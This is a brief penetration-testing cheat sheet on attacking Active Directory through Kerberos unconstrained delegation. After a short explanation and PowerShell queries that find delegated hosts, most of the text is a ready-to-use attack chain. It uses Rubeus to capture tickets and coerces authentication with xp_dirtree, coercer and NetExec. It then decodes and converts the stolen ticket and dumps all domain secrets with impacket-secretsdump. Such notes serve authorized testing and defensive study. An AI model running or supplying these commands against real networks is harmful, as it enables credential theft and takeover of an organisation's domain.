Kerberos Unconstrained Delegation
Unconstrained Delegation is a feature in Active Directory that allows designated services to act on behalf of users and request access to other network resources without requiring additional authentication. This delegation model grants those services broad authority, allowing them to impersonate any user to any service. While powerful, it poses serious security risks when misconfigured.
Detecting Unconstrained Delegation
1
| Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
|
1
2
| Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation,servicePrincipalName,Description |
Format-List Name,TrustedForDelegation,servicePrincipalName,Description
|
Exploitation
Monitor incoming Kerberos tickets:
1
| .\Rubeus.exe monitor /interval:5 /nowrap
|
Monitor for a specific user:
1
| .\Rubeus.exe monitor /interval:10 /targetuser:$target_user /nowrap
|
Request Deleg Ticket for Computers:
1
| .\Rubeus.exe tgtdeleg /nowrap
|
Coerce Authentication
Trigger authentication from the target system:
1
| xp_dirtree \\$target_Domain\share
|
1
| coercer coerce -u $user -p '$pass' -d $Domain -l $target_Domain -t $IP
|
1
| python3 coercer.py -u $user -h <hash> -d $Domain -l $IP -t $target_Domain
|
1
| nxc smb $ip -u $user -p '$pass' -M coerce_plus -o LISTENER=$target_Domain ALWAYS=true
|
Decode Base64 Ticket
1
2
| nano ticket.kirbi.b64
base64 -d ticket.kirbi.b64 > DC.kirbi
|
or
1
| echo "<ticket>" | base64 -d > DC.kirbi
|
1
| impacket-ticketConverter DC.kirbi DC.ccache
|
Set ccache:
1
| export KRB5CCNAME=DC.ccache
|
Dump domain secrets:
1
| impacket-secretsdump -k -no-pass -just-dc $Domain
|
